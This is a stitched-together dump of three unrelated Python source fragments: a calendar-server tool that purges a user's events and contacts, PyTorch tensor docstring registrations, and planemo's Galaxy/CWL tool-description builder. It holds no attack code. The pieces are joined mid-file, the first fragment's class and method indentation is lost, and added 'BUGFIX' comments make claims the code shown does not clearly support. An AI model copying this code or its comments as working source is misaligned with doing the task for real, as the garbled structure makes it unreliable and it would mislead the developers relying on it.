        numOldRemoved = yield txn.removeOldManagedAttachments(self.cutoff, self.uuid, batchSize=self.batchSize)
        yield txn.commit()
        if numOldRemoved:
            totalRemoved += numOldRemoved
            if self.verbose:
                # Progress: running total after each batch.
                print(" %d," % (totalRemoved,),)
        elif self.verbose:
            # Terminate the progress line started above.
            print("")
    if self.verbose:
        if totalRemoved == 0:
            print("No old managed attachments were removed")
        elif totalRemoved == 1:
            print("1 old managed attachment was removed in total")
        else:
            print("%d old managed attachments were removed in total" % (totalRemoved,))
        print("")
    returnValue(totalRemoved)
class PurgePrincipalService(WorkerService):
root = None
directory = None
uids = None
dryrun = False
verbose = False
proxies = True
when = None
@classmethod
def usage(cls, e=None):
    """Print command-line help, then exit.

    When an error *e* is supplied it is written to stderr and the process
    exits with status 64 (EX_USAGE); otherwise the exit status is 0.
    """
    name = os.path.basename(sys.argv[0])
    helpLines = (
        "usage: %s [options]" % (name,),
        "",
        "  Remove a principal's events and contacts from the calendar server",
        "  Future events are declined or cancelled",
        "",
        "options:",
        "  -h --help: print this help and exit",
        "  -f --config <path>: Specify caldavd.plist configuration path",
        "  -n --dry-run: calculate how many events and contacts to purge, but do not purge data",
        "  -v --verbose: print progress information",
        "  -D --debug: debug logging",
        "",
    )
    for helpLine in helpLines:
        print(helpLine)
    if e:
        sys.stderr.write("%s\n" % (e,))
        sys.exit(64)
    sys.exit(0)
@classmethod
def main(cls):
    """Command-line entry point: parse options, then run via ``utilityMain``.

    Positional arguments are the UIDs of the principals to purge; flags
    mirror those documented in ``usage``.
    """
    try:
        (optargs, args) = getopt(
            sys.argv[1:], "Df:hnv", [
                "dry-run",
                "config=",
                "help",
                "verbose",
                "debug",
            ],
        )
    except GetoptError as e:
        # BUGFIX: "except GetoptError, e" is Python-2-only syntax; the
        # "as e" form is accepted by Python 2.6+ and Python 3 alike.
        cls.usage(e)
    #
    # Get configuration
    #
    configFileName = None
    dryrun = False
    verbose = False
    debug = False
    for opt, arg in optargs:
        if opt in ("-h", "--help"):
            cls.usage()
        elif opt in ("-v", "--verbose"):
            verbose = True
        elif opt in ("-D", "--debug"):
            debug = True
        elif opt in ("-n", "--dry-run"):
            dryrun = True
        elif opt in ("-f", "--config"):
            configFileName = arg
        else:
            raise NotImplementedError(opt)
    # args is a list of uids
    cls.uids = args
    cls.dryrun = dryrun
    cls.verbose = verbose
    utilityMain(
        configFileName,
        cls,
        verbose=debug,
    )
@classmethod
@inlineCallbacks
def purgeUIDs(cls, store, directory, uids, verbose=False, dryrun=False,
              proxies=True, when=None):
    """Build a purge service from the given settings and run it.

    Returns (via ``returnValue``) the count reported by ``doWork``.
    """
    svc = cls(store)
    svc.directory = directory
    svc.uids = uids
    svc.verbose = verbose
    svc.dryrun = dryrun
    svc.proxies = proxies
    svc.when = when
    workResult = yield svc.doWork()
    returnValue(workResult)
@inlineCallbacks
def doWork(self):
    """Purge every configured UID and return the total number of events
    modified or deleted (via ``returnValue``).
    """
    if self.directory is None:
        self.directory = self.store.directoryService()
    total = 0
    for uid in self.uids:
        count = yield self._purgeUID(uid)
        total += count
    if self.verbose:
        # BUGFIX: use "!= 1" so a zero count reads "0 events" rather than
        # the ungrammatical "0 event" produced by the previous "> 1" test.
        amount = "%d event%s" % (total, "s" if total != 1 else "")
        if self.dryrun:
            print("Would have modified or deleted %s" % (amount,))
        else:
            print("Modified or deleted %s" % (amount,))
    returnValue(total)
@inlineCallbacks
def _purgeUID(self, uid):
    """Purge all calendar and addressbook data for one principal UID.

    Returns (via ``returnValue``) the number of items modified or
    deleted across calendars and addressbooks.
    """
    if self.when is None:
        # Default cutoff is "now": everything from now on gets cancelled.
        self.when = DateTime.getNowUTC()
    # Both calendar-user-address forms that may identify this principal.
    cuas = set((
        "urn:uuid:{}".format(uid),
        "urn:x-uid:{}".format(uid)
    ))
    # See if calendar home is provisioned
    txn = self.store.newTransaction()
    storeCalHome = yield txn.calendarHomeWithUID(uid)
    calHomeProvisioned = storeCalHome is not None
    # Always, unshare collections, remove notifications
    if calHomeProvisioned:
        yield self._cleanHome(txn, storeCalHome)
    yield txn.commit()
    count = 0
    if calHomeProvisioned:
        count = yield self._cancelEvents(txn, uid, cuas)
    # Remove empty calendar collections (and calendar home if no more
    # calendars)
    yield self._removeCalendarHome(uid)
    # Remove VCards
    count += (yield self._removeAddressbookHome(uid))
    if self.proxies and not self.dryrun:
        if self.verbose:
            print("Deleting any proxy assignments")
        yield self._purgeProxyAssignments(self.store, uid)
    returnValue(count)
@inlineCallbacks
def _cleanHome(self, txn, storeCalHome):
    """Unshare every calendar in the home and purge its notifications.

    Honors dry-run mode: actions are reported but not performed.
    """
    # Process shared and shared-to-me calendars
    children = list((yield storeCalHome.children()))
    for child in children:
        if self.verbose:
            if self.dryrun:
                print("Would unshare: %s" % (child.name(),))
            else:
                print("Unsharing: %s" % (child.name(),))
        if not self.dryrun:
            yield child.unshare()
    if not self.dryrun:
        yield storeCalHome.removeUnacceptedShares()
        # NOTE(review): the notification purge is kept under the dry-run
        # guard here — confirm against upstream indentation intent.
        notificationHome = yield txn.notificationsWithUID(storeCalHome.uid())
        if notificationHome is not None:
            yield notificationHome.purge()
@inlineCallbacks
def _cancelEvents(self, txn, uid, cuas):
    """Cancel or delete a principal's events.

    Events entirely in the past are left alone; events matching the
    future time-range filter are purged with implicit scheduling so other
    attendees/organizers are notified.  Returns the number of events
    removed (via ``returnValue``).

    BUGFIX: the three ``except Exception, e`` clauses used Python-2-only
    syntax; they are now the ``except ... as e`` form (valid on 2.6+/3.x).
    """
    # Anything in the past is left alone
    whenString = self.when.getText()
    query_filter = caldavxml.Filter(
        caldavxml.ComponentFilter(
            caldavxml.ComponentFilter(
                caldavxml.TimeRange(start=whenString,),
                name=("VEVENT",),
            ),
            name="VCALENDAR",
        )
    )
    query_filter = Filter(query_filter)
    count = 0
    txn = self.store.newTransaction()
    storeCalHome = yield txn.calendarHomeWithUID(uid)
    calendarNames = yield storeCalHome.listCalendars()
    yield txn.commit()
    for calendarName in calendarNames:
        txn = self.store.newTransaction(authz_uid=uid)
        storeCalHome = yield txn.calendarHomeWithUID(uid)
        calendar = yield storeCalHome.calendarWithName(calendarName)
        allChildNames = []
        futureChildNames = set()
        # Only purge owned calendars
        if calendar.owned():
            # all events
            for childName in (yield calendar.listCalendarObjects()):
                allChildNames.append(childName)
            # events matching filter
            for childName, _ignore_childUid, _ignore_childType in (yield calendar.search(query_filter)):
                futureChildNames.add(childName)
        yield txn.commit()
        for childName in allChildNames:
            txn = self.store.newTransaction(authz_uid=uid)
            storeCalHome = yield txn.calendarHomeWithUID(uid)
            calendar = yield storeCalHome.calendarWithName(calendarName)
            doScheduling = childName in futureChildNames
            try:
                childResource = yield calendar.calendarObjectWithName(childName)
                uri = "/calendars/__uids__/%s/%s/%s" % (storeCalHome.uid(), calendar.name(), childName)
                # In dry-run mode we count everything we *would* delete.
                incrementCount = self.dryrun
                if self.verbose:
                    if self.dryrun:
                        print("Would delete%s: %s" % (" with scheduling" if doScheduling else "", uri,))
                    else:
                        print("Deleting%s: %s" % (" with scheduling" if doScheduling else "", uri,))
                if not self.dryrun:
                    retry = False
                    try:
                        yield childResource.purge(implicitly=doScheduling)
                        incrementCount = True
                    except Exception as e:
                        print("Exception deleting %s: %s" % (uri, str(e)))
                        retry = True
                    if retry and doScheduling:
                        # Try again with implicit scheduling off
                        print("Retrying deletion of %s with scheduling turned off" % (uri,))
                        try:
                            yield childResource.purge(implicitly=False)
                            incrementCount = True
                        except Exception as e:
                            print("Still couldn't delete %s even with scheduling turned off: %s" % (uri, str(e)))
                if incrementCount:
                    count += 1
                # Commit
                yield txn.commit()
            except Exception as e:
                # Abort
                yield txn.abort()
                raise e
    returnValue(count)
@inlineCallbacks
def _removeCalendarHome(self, uid):
    """Remove a principal's empty calendars and, when none remain,
    queue the calendar home itself for deferred deletion.

    BUGFIX: the ``except Exception, e`` clause used Python-2-only syntax;
    it is now ``except Exception as e`` (valid on Python 2.6+ and 3.x).
    """
    try:
        txn = self.store.newTransaction(authz_uid=uid)
        # Remove empty calendar collections (and calendar home if no more
        # calendars)
        storeCalHome = yield txn.calendarHomeWithUID(uid)
        if storeCalHome is not None:
            calendars = list((yield storeCalHome.calendars()))
            calendars.extend(list((yield storeCalHome.calendars(onlyInTrash=True))))
            remainingCalendars = len(calendars)
            for calColl in calendars:
                # Only empty calendars are candidates for removal.
                if len(list((yield calColl.calendarObjects()))) == 0:
                    remainingCalendars -= 1
                    calendarName = calColl.name()
                    if self.verbose:
                        if self.dryrun:
                            print("Would delete calendar: %s" % (calendarName,))
                        else:
                            print("Deleting calendar: %s" % (calendarName,))
                    if not self.dryrun:
                        if calColl.owned():
                            yield storeCalHome.removeChildWithName(calendarName, useTrash=False)
                        else:
                            yield calColl.unshare()
            if not remainingCalendars:
                if self.verbose:
                    if self.dryrun:
                        print("Would delete calendar home")
                    else:
                        print("Deleting calendar home")
                if not self.dryrun:
                    # Queue a job to delete the calendar home after any scheduling operations
                    # are complete
                    notBefore = (
                        datetime.datetime.utcnow() +
                        datetime.timedelta(seconds=config.AutomaticPurging.HomePurgeDelaySeconds)
                    )
                    yield txn.enqueue(
                        PrincipalPurgeHomeWork,
                        homeResourceID=storeCalHome.id(),
                        notBefore=notBefore
                    )
                    # Also mark the home as purging so it won't be looked at again during
                    # purge polling
                    yield storeCalHome.purge()
        # Commit
        yield txn.commit()
    except Exception as e:
        # Abort
        yield txn.abort()
        raise e
@inlineCallbacks
def _removeAddressbookHome(self, uid):
count = 0
txn = self.store.newTransaction(authz_uid=uid)
try:
# Remove VCards
storeAbHome = yield txn.addressbookHomeWithUID(uid)
if storeAbHome is not None:
for abColl | |
torch.tensor([[1, 2], [3, 4], [5, 6]])
>>> x.resize_(2, 2)
tensor([[ 1, 2],
[ 3, 4]])
""")
add_docstr_all('resize_as_',
r"""
resize_as_(tensor) -> Tensor
Resizes the :attr:`self` tensor to be the same size as the specified
:attr:`tensor`. This is equivalent to ``self.resize_(tensor.size())``.
""")
add_docstr_all('rot90',
r"""
rot90(k, dims) -> Tensor
See :func:`torch.rot90`
""")
add_docstr_all('round',
r"""
round() -> Tensor
See :func:`torch.round`
""")
add_docstr_all('round_',
r"""
round_() -> Tensor
In-place version of :meth:`~Tensor.round`
""")
add_docstr_all('rsqrt',
r"""
rsqrt() -> Tensor
See :func:`torch.rsqrt`
""")
add_docstr_all('rsqrt_',
r"""
rsqrt_() -> Tensor
In-place version of :meth:`~Tensor.rsqrt`
""")
add_docstr_all('scatter_',
r"""
scatter_(dim, index, src) -> Tensor
Writes all values from the tensor :attr:`src` into :attr:`self` at the indices
specified in the :attr:`index` tensor. For each value in :attr:`src`, its output
index is specified by its index in :attr:`src` for ``dimension != dim`` and by
the corresponding value in :attr:`index` for ``dimension = dim``.
For a 3-D tensor, :attr:`self` is updated as::
self[index[i][j][k]][j][k] = src[i][j][k] # if dim == 0
self[i][index[i][j][k]][k] = src[i][j][k] # if dim == 1
self[i][j][index[i][j][k]] = src[i][j][k] # if dim == 2
This is the reverse operation of the manner described in :meth:`~Tensor.gather`.
:attr:`self`, :attr:`index` and :attr:`src` (if it is a Tensor) should have same
number of dimensions. It is also required that ``index.size(d) <= src.size(d)``
for all dimensions ``d``, and that ``index.size(d) <= self.size(d)`` for all
dimensions ``d != dim``.
Moreover, as for :meth:`~Tensor.gather`, the values of :attr:`index` must be
between ``0`` and ``self.size(dim) - 1`` inclusive, and all values in a row
along the specified dimension :attr:`dim` must be unique.
Args:
dim (int): the axis along which to index
index (LongTensor): the indices of elements to scatter,
can be either empty or the same size of src.
When empty, the operation returns identity
src (Tensor or float): the source element(s) to scatter
Example::
>>> x = torch.rand(2, 5)
>>> x
tensor([[ 0.3992, 0.2908, 0.9044, 0.4850, 0.6004],
[ 0.5735, 0.9006, 0.6797, 0.4152, 0.1732]])
>>> torch.zeros(3, 5).scatter_(0, torch.tensor([[0, 1, 2, 0, 0], [2, 0, 0, 1, 2]]), x)
tensor([[ 0.3992, 0.9006, 0.6797, 0.4850, 0.6004],
[ 0.0000, 0.2908, 0.0000, 0.4152, 0.0000],
[ 0.5735, 0.0000, 0.9044, 0.0000, 0.1732]])
>>> z = torch.zeros(2, 4).scatter_(1, torch.tensor([[2], [3]]), 1.23)
>>> z
tensor([[ 0.0000, 0.0000, 1.2300, 0.0000],
[ 0.0000, 0.0000, 0.0000, 1.2300]])
""")
add_docstr_all('scatter_add_',
r"""
scatter_add_(dim, index, other) -> Tensor
Adds all values from the tensor :attr:`other` into :attr:`self` at the indices
specified in the :attr:`index` tensor in a similar fashion as
:meth:`~torch.Tensor.scatter_`. For each value in :attr:`other`, it is added to
an index in :attr:`self` which is specified by its index in :attr:`other`
for ``dimension != dim`` and by the corresponding value in :attr:`index` for
``dimension = dim``.
For a 3-D tensor, :attr:`self` is updated as::
self[index[i][j][k]][j][k] += other[i][j][k] # if dim == 0
self[i][index[i][j][k]][k] += other[i][j][k] # if dim == 1
self[i][j][index[i][j][k]] += other[i][j][k] # if dim == 2
:attr:`self`, :attr:`index` and :attr:`other` should have same number of
dimensions. It is also required that ``index.size(d) <= other.size(d)`` for all
dimensions ``d``, and that ``index.size(d) <= self.size(d)`` for all dimensions
``d != dim``.
Moreover, as for :meth:`~Tensor.gather`, the values of :attr:`index` must be
between ``0`` and ``self.size(dim) - 1`` inclusive, and all values in a row along
the specified dimension :attr:`dim` must be unique.
.. include:: cuda_deterministic.rst
Args:
dim (int): the axis along which to index
index (LongTensor): the indices of elements to scatter and add,
can be either empty or the same size of src.
When empty, the operation returns identity.
other (Tensor): the source elements to scatter and add
Example::
>>> x = torch.rand(2, 5)
>>> x
tensor([[0.7404, 0.0427, 0.6480, 0.3806, 0.8328],
[0.7953, 0.2009, 0.9154, 0.6782, 0.9620]])
>>> torch.ones(3, 5).scatter_add_(0, torch.tensor([[0, 1, 2, 0, 0], [2, 0, 0, 1, 2]]), x)
tensor([[1.7404, 1.2009, 1.9154, 1.3806, 1.8328],
[1.0000, 1.0427, 1.0000, 1.6782, 1.0000],
[1.7953, 1.0000, 1.6480, 1.0000, 1.9620]])
""")
add_docstr_all('select',
r"""
select(dim, index) -> Tensor
Slices the :attr:`self` tensor along the selected dimension at the given index.
This function returns a tensor with the given dimension removed.
Args:
dim (int): the dimension to slice
index (int): the index to select with
.. note::
:meth:`select` is equivalent to slicing. For example,
``tensor.select(0, index)`` is equivalent to ``tensor[index]`` and
``tensor.select(2, index)`` is equivalent to ``tensor[:,:,index]``.
""")
add_docstr_all('set_',
r"""
set_(source=None, storage_offset=0, size=None, stride=None) -> Tensor
Sets the underlying storage, size, and strides. If :attr:`source` is a tensor,
:attr:`self` tensor will share the same storage and have the same size and
strides as :attr:`source`. Changes to elements in one tensor will be reflected
in the other.
If :attr:`source` is a :class:`~torch.Storage`, the method sets the underlying
storage, offset, size, and stride.
Args:
source (Tensor or Storage): the tensor or storage to use
storage_offset (int, optional): the offset in the storage
size (torch.Size, optional): the desired size. Defaults to the size of the source.
stride (tuple, optional): the desired stride. Defaults to C-contiguous strides.
""")
add_docstr_all('sigmoid',
r"""
sigmoid() -> Tensor
See :func:`torch.sigmoid`
""")
add_docstr_all('sigmoid_',
r"""
sigmoid_() -> Tensor
In-place version of :meth:`~Tensor.sigmoid`
""")
add_docstr_all('sign',
r"""
sign() -> Tensor
See :func:`torch.sign`
""")
add_docstr_all('sign_',
r"""
sign_() -> Tensor
In-place version of :meth:`~Tensor.sign`
""")
add_docstr_all('sin',
r"""
sin() -> Tensor
See :func:`torch.sin`
""")
add_docstr_all('sin_',
r"""
sin_() -> Tensor
In-place version of :meth:`~Tensor.sin`
""")
add_docstr_all('sinh',
r"""
sinh() -> Tensor
See :func:`torch.sinh`
""")
add_docstr_all('sinh_',
r"""
sinh_() -> Tensor
In-place version of :meth:`~Tensor.sinh`
""")
add_docstr_all('size',
r"""
size() -> torch.Size
Returns the size of the :attr:`self` tensor. The returned value is a subclass of
:class:`tuple`.
Example::
>>> torch.empty(3, 4, 5).size()
torch.Size([3, 4, 5])
""")
add_docstr_all('sort',
r"""
sort(dim=None, descending=False) -> (Tensor, LongTensor)
See :func:`torch.sort`
""")
# Docstring registration for Tensor.sparse_dim.
# FIX: "returns a the number" -> "returns the number" (typo in docstring).
add_docstr_all('sparse_dim',
               r"""
sparse_dim() -> int
If :attr:`self` is a sparse COO tensor (i.e., with ``torch.sparse_coo`` layout),
this returns the number of sparse dimensions. Otherwise, this throws an
error.
See also :meth:`Tensor.dense_dim`.
""")
add_docstr_all('sqrt',
r"""
sqrt() -> Tensor
See :func:`torch.sqrt`
""")
add_docstr_all('sqrt_',
r"""
sqrt_() -> Tensor
In-place version of :meth:`~Tensor.sqrt`
""")
add_docstr_all('squeeze',
r"""
squeeze(dim=None) -> Tensor
See :func:`torch.squeeze`
""")
add_docstr_all('squeeze_',
r"""
squeeze_(dim=None) -> Tensor
In-place version of :meth:`~Tensor.squeeze`
""")
add_docstr_all('std',
r"""
std(dim=None, unbiased=True, keepdim=False) -> Tensor
See :func:`torch.std`
""")
add_docstr_all('storage',
r"""
storage() -> torch.Storage
Returns the underlying storage
""")
add_docstr_all('storage_offset',
r"""
storage_offset() -> int
Returns :attr:`self` tensor's offset in the underlying storage in terms of
number of storage elements (not bytes).
Example::
>>> x = torch.tensor([1, 2, 3, 4, 5])
>>> x.storage_offset()
0
>>> x[3:].storage_offset()
3
""")
# Docstring registration for Tensor.stride.
# FIX: doctest prompt ">>>x.stride(0)" was missing the space after ">>>",
# which breaks doctest parsing and Sphinx rendering of the example.
add_docstr_all('stride',
               r"""
stride(dim) -> tuple or int
Returns the stride of :attr:`self` tensor.
Stride is the jump necessary to go from one element to the next one in the
specified dimension :attr:`dim`. A tuple of all strides is returned when no
argument is passed in. Otherwise, an integer value is returned as the stride in
the particular dimension :attr:`dim`.
Args:
    dim (int, optional): the desired dimension in which stride is required
Example::
    >>> x = torch.tensor([[1, 2, 3, 4, 5], [6, 7, 8, 9, 10]])
    >>> x.stride()
    (5, 1)
    >>> x.stride(0)
    5
    >>> x.stride(-1)
    1
""")
add_docstr_all('sub',
r"""
sub(value, other) -> Tensor
Subtracts a scalar or tensor from :attr:`self` tensor. If both :attr:`value` and
:attr:`other` are specified, each element of :attr:`other` is scaled by
:attr:`value` before being used.
When :attr:`other` is a tensor, the shape of :attr:`other` must be
:ref:`broadcastable <broadcasting-semantics>` with the shape of the underlying
tensor.
""")
add_docstr_all('sub_',
r"""
sub_(x) -> Tensor
In-place version of :meth:`~Tensor.sub`
""")
add_docstr_all('sum',
r"""
sum(dim=None, keepdim=False, dtype=None) -> Tensor
See :func:`torch.sum`
""")
add_docstr_all('svd',
r"""
svd(some=True, compute_uv=True) -> (Tensor, Tensor, Tensor)
See :func:`torch.svd`
""")
add_docstr_all('symeig',
r"""
symeig(eigenvectors=False, upper=True) -> (Tensor, Tensor)
See :func:`torch.symeig`
""")
add_docstr_all('t',
r"""
t() -> Tensor
See :func:`torch.t`
""")
add_docstr_all('t_',
r"""
t_() -> Tensor
In-place version of :meth:`~Tensor.t`
""")
add_docstr_all('to',
r"""
to(*args, **kwargs) -> Tensor
Performs Tensor dtype and/or device conversion. A :class:`torch.dtype` and :class:`torch.device` are
inferred from the arguments of ``self.to(*args, **kwargs)``.
.. note::
If the ``self`` Tensor already
has the correct :class:`torch.dtype` and :class:`torch.device`, then ``self`` is returned.
Otherwise, the returned tensor is a copy of ``self`` with the desired
:class:`torch.dtype` and :class:`torch.device`.
Here are the ways to call ``to``:
.. function:: to(dtype, non_blocking=False, copy=False) -> Tensor
Returns a Tensor with the specified :attr:`dtype`
.. function:: to(device=None, dtype=None, non_blocking=False, copy=False) -> Tensor
Returns a Tensor with the specified :attr:`device` and (optional)
:attr:`dtype`. If :attr:`dtype` is ``None`` it is inferred to be ``self.dtype``.
When :attr:`non_blocking`, tries to convert asynchronously with respect to
the host if possible, e.g., converting a CPU Tensor with pinned memory to a
CUDA Tensor.
When :attr:`copy` is set, a new Tensor is created even when the Tensor
already matches the desired conversion.
.. function:: to(other, non_blocking=False, copy=False) -> Tensor
Returns a Tensor with same :class:`torch.dtype` and :class:`torch.device` as
the Tensor :attr:`other`. When :attr:`non_blocking`, tries to convert
asynchronously with respect to the host if possible, e.g., converting a CPU
Tensor with pinned memory to a CUDA Tensor.
When :attr:`copy` is set, a new Tensor is created even when the Tensor
already matches the desired conversion.
Example::
>>> tensor = torch.randn(2, 2) # Initially dtype=float32, device=cpu
>>> tensor.to(torch.float64)
tensor([[-0.5044, 0.0005],
[ 0.3310, -0.0584]], dtype=torch.float64)
>>> cuda0 = torch.device('cuda:0')
>>> tensor.to(cuda0)
tensor([[-0.5044, 0.0005],
[ 0.3310, -0.0584]], device='cuda:0')
>>> tensor.to(cuda0, dtype=torch.float64)
tensor([[-0.5044, 0.0005],
[ 0.3310, -0.0584]], dtype=torch.float64, device='cuda:0')
>>> other = torch.randn((), | |
<gh_stars>0
"""This module contains :func:`build` to build tool descriptions.
This class is used by the `tool_init` command and can be used to build
Galaxy and CWL tool descriptions.
"""
import os
import re
import shlex
import shutil
import subprocess
from collections import namedtuple
from planemo import io
from planemo import templates
REUSING_MACROS_MESSAGE = ("Macros file macros.xml already exists, assuming "
" it has relevant planemo-generated definitions.")
DEFAULT_CWL_VERSION = "v1.0"
TOOL_TEMPLATE = """<tool id="{{id}}" name="{{name}}" version="{{version}}">
{%- if description %}
<description>{{ description }}</description>
{%- endif %}
{%- if macros %}
<macros>
<import>macros.xml</import>
</macros>
<expand macro="requirements" />
{%- if version_command %}
<expand macro="version_command" />
{%- endif %}
{%- else %}
<requirements>
{%- for requirement in requirements %}
{{ requirement }}
{%- endfor %}
{%- for container in containers %}
{{ container }}
{%- endfor %}
</requirements>
{%- if version_command %}
<version_command>{{ version_command }}</version_command>
{%- endif %}
{%- endif %}
<command detect_errors="exit_code"><![CDATA[
{%- if command %}
{{ command }}
{%- else %}
TODO: Fill in command template.
{%- endif %}
]]></command>
<inputs>
{%- for input in inputs %}
{{ input }}
{%- endfor %}
</inputs>
<outputs>
{%- for output in outputs %}
{{ output }}
{%- endfor %}
</outputs>
{%- if tests %}
<tests>
{%- for test in tests %}
<test>
{%- for param in test.params %}
<param name="{{ param[0]}}" value="{{ param[1] }}"/>
{%- endfor %}
{%- for output in test.outputs %}
<output name="{{ output[0] }}" file="{{ output[1] }}"/>
{%- endfor %}
</test>
{%- endfor %}
</tests>
{%- endif %}
<help><![CDATA[
{%- if help %}
{{ help }}
{%- else %}
TODO: Fill in help.
{%- endif %}
]]></help>
{%- if macros %}
<expand macro="citations" />
{%- else %}
{%- if doi or bibtex_citations %}
<citations>
{%- for single_doi in doi %}
<citation type="doi">{{ single_doi }}</citation>
{%- endfor %}
{%- for bibtex_citation in bibtex_citations %}
<citation type="bibtex">{{ bibtex_citation }}</citation>
{%- endfor %}
</citations>
{%- endif %}
{%- endif %}
</tool>
"""
MACROS_TEMPLATE = """<macros>
<xml name="requirements">
<requirements>
{%- for requirement in requirements %}
{{ requirement }}
{%- endfor %}
<yield/>
{%- for container in containers %}
{{ container }}
{%- endfor %}
</requirements>
</xml>
<xml name="citations">
<citations>
{%- for single_doi in doi %}
<citation type="doi">{{ single_doi }}</citation>
{%- endfor %}
{%- for bibtex_citation in bibtex_citations %}
<citation type="bibtex">{{ bibtex_citation }}</citation>
{%- endfor %}
<yield />
</citations>
</xml>
{%- if version_command %}
<xml name="version_command">
<version_command>{{ version_command }}</version_command>
</xml>
{%- endif %}
</macros>
"""
CWL_TEMPLATE = """#!/usr/bin/env cwl-runner
cwlVersion: '{{cwl_version}}'
class: CommandLineTool
id: "{{id}}"
label: "{{label}}"
{%- if containers or requirements %}
hints:
{%- for container in containers %}
DockerRequirement:
dockerPull: {{ container.image_id }}
{%- endfor %}
{%- if requirements %}
SoftwareRequirement:
packages:
{%- for requirement in requirements %}
- package: {{ requirement.name }}
{%- if requirement.version %}
version:
- "{{ requirement.version }}"
{%- else %}
version: []
{%- endif %}
{%- endfor %}
{%- endif %}
{%- endif %}
{%- if inputs or outputs %}
inputs:
{%- for input in inputs %}
{{ input.id }}:
type: {{ input.type }}
doc: |
TODO
inputBinding:
position: {{ input.position }}
{%- if input.prefix %}
prefix: "{{input.prefix.prefix}}"
{%- if not input.prefix.separated %}
separate: false
{%- endif %}
{%- endif %}
{%- endfor %}
{%- for output in outputs %}
{%- if output.require_filename %}
{{ output.id }}:
type: string
doc: |
Filename for output {{ output.id }}
inputBinding:
position: {{ output.position }}
{%- if output.prefix %}
prefix: "{{output.prefix.prefix}}"
{%- if not output.prefix.separated %}
separate: false
{%- endif %}
{%- endif %}
{%- endif %}
{%- endfor %}
{%- else %}
inputs: [] # TODO
{%- endif %}
{%- if outputs %}
outputs:
{%- for output in outputs %}
{{ output.id }}:
type: File
outputBinding:
glob: {{ output.glob }}
{%- endfor %}
{%- else %}
outputs: [] # TODO
{%- endif %}
{%- if base_command %}
baseCommand:
{%- for base_command_part in base_command %}
- "{{ base_command_part}}"
{%- endfor %}
{%- else %}
baseCommand: []
{%- endif %}
{%- if arguments %}
arguments:
{%- for argument in arguments %}
- valueFrom: "{{ argument.value }}"
position: {{ argument.position }}
{%- if argument.prefix %}
prefix: "{{argument.prefix.prefix}}"
{%- if not argument.prefix.separated %}
separate: false
{%- endif %}
{%- endif %}
{%- endfor %}
{%- else %}
arguments: []
{%- endif %}
{%- if stdout %}
stdout: {{ stdout }}
{%- endif %}
doc: |
{%- if help %}
{{ help|indent(2) }}
{%- else %}
TODO: Fill in description.
{%- endif %}
"""
CWL_TEST_TEMPLATE = """
- doc: test generated from example command
job: {{ job_filename }}
{%- if outputs %}
outputs:
{%- for output in outputs %}
{{ output.id }}:
path: test-data/{{ output.example_value }}
{%- endfor %}
{%- else %}
outputs: TODO
{%- endif %}
"""
CWL_JOB_TEMPLATE = """
{%- if inputs %}
{%- for input in inputs %}
{%- if input.type == "File" %}
{{ input.id }}:
class: File
path: test-data/{{ input.example_value }}
{%- else %}
{{ input.id }}: {{ input.example_value }}
{%- endif %}
{%- endfor %}
{%- else %}
# TODO: Specify job input.
{}
{%- endif %}
"""
def build(**kwds):
    """Build up a :class:`ToolDescription` from supplied arguments.

    Dispatches to the CWL builder when ``kwds["cwl"]`` is truthy and to
    the Galaxy XML builder otherwise.
    """
    if kwds.get("cwl"):
        builder = _build_cwl
    else:
        builder = _build_galaxy
    return builder(**kwds)
def _build_cwl(**kwds):
    """Build a CWL tool description (plus optional test/job files) from kwds."""
    _handle_help(kwds)
    _handle_requirements(kwds)
    # Only a single container can be expressed as a CWL DockerRequirement here.
    assert len(kwds["containers"]) <= 1, kwds
    command_io = CommandIO(**kwds)
    render_kwds = {
        "cwl_version": DEFAULT_CWL_VERSION,
        "help": kwds.get("help", ""),
        "containers": kwds.get("containers", []),
        "requirements": kwds.get("requirements", []),
        "id": kwds.get("id"),
        "label": kwds.get("name"),
    }
    render_kwds.update(command_io.cwl_properties())
    contents = _render(render_kwds, template_str=CWL_TEMPLATE)
    tool_files = []
    test_files = []
    if kwds["test_case"]:
        # Match the separator style of the tool id when naming side files.
        sep = "-" if "-" in kwds.get("id") else "_"
        tests_path = "%s%stests.yml" % (kwds.get("id"), sep)
        job_path = "%s%sjob.yml" % (kwds.get("id"), sep)
        render_kwds["job_filename"] = job_path
        test_contents = _render(render_kwds, template_str=CWL_TEST_TEMPLATE)
        job_contents = _render(render_kwds, template_str=CWL_JOB_TEMPLATE)
        tool_files.append(ToolFile(tests_path, test_contents, "test"))
        tool_files.append(ToolFile(job_path, job_contents, "job"))
        # Record the example data files the generated test expects to find
        # under test-data/.
        for cwl_input in render_kwds["inputs"] or []:
            if cwl_input.type == "File" and cwl_input.example_value:
                test_files.append(cwl_input.example_value)
        for cwl_output in render_kwds["outputs"] or []:
            if cwl_output.example_value:
                test_files.append(cwl_output.example_value)
    return ToolDescription(
        contents,
        tool_files=tool_files,
        test_files=test_files
    )
def _build_galaxy(**kwds):
    """Build a Galaxy XML tool description from kwds."""
    # Test case to build up from supplied inputs and outputs, ultimately
    # ignored unless kwds["test_case"] is truthy.
    _handle_help(kwds)
    # process raw cite urls
    cite_urls = kwds.get("cite_url", [])
    del kwds["cite_url"]
    citations = list(map(UrlCitation, cite_urls))
    kwds["bibtex_citations"] = citations
    # handle requirements and containers
    _handle_requirements(kwds)
    command_io = CommandIO(**kwds)
    kwds["inputs"] = command_io.inputs
    kwds["outputs"] = command_io.outputs
    kwds["command"] = command_io.cheetah_template
    test_case = command_io.test_case()
    # finally wrap up tests
    tests, test_files = _handle_tests(kwds, test_case)
    kwds["tests"] = tests
    # Render tool content from template.
    contents = _render(kwds)
    tool_files = []
    append_macro_file(tool_files, kwds)
    return ToolDescription(
        contents,
        tool_files=tool_files,
        test_files=test_files
    )
def append_macro_file(tool_files, kwds):
    """Render macros.xml and add it to ``tool_files`` when requested.

    When ``kwds["macros"]`` is set, the rendered macros file is appended
    only if ``macros.xml`` does not already exist on disk; otherwise an
    informational message notes that the existing file is being reused.
    """
    macro_contents = None
    if kwds["macros"]:
        macro_contents = _render(kwds, MACROS_TEMPLATE)
        macros_file = "macros.xml"
        if not os.path.exists(macros_file):
            tool_files.append(ToolFile(macros_file, macro_contents, "macros"))
        else:
            # BUGFIX: only claim an existing macros.xml is being reused when
            # one actually exists; previously REUSING_MACROS_MESSAGE was
            # printed unconditionally, even for a freshly generated file.
            io.info(REUSING_MACROS_MESSAGE)
class CommandIO(object):
def __init__(self, **kwds):
    """Normalize raw/example inputs and outputs and derive the command template.

    Consumes the ``input``/``example_input``/``output``/``named_output``/
    ``example_output`` keyword entries, replacing example file names in
    the command with generated parameter names.
    """
